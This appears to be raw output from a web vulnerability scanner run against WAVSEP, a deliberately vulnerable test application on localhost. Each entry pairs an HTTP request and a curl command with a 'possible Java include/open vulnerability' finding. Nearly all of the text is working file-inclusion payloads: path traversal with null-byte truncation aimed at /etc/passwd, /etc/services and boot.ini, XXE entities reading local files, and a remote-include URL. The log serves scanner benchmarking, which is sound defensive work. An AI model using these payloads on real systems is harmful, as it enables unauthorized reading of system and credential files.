GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
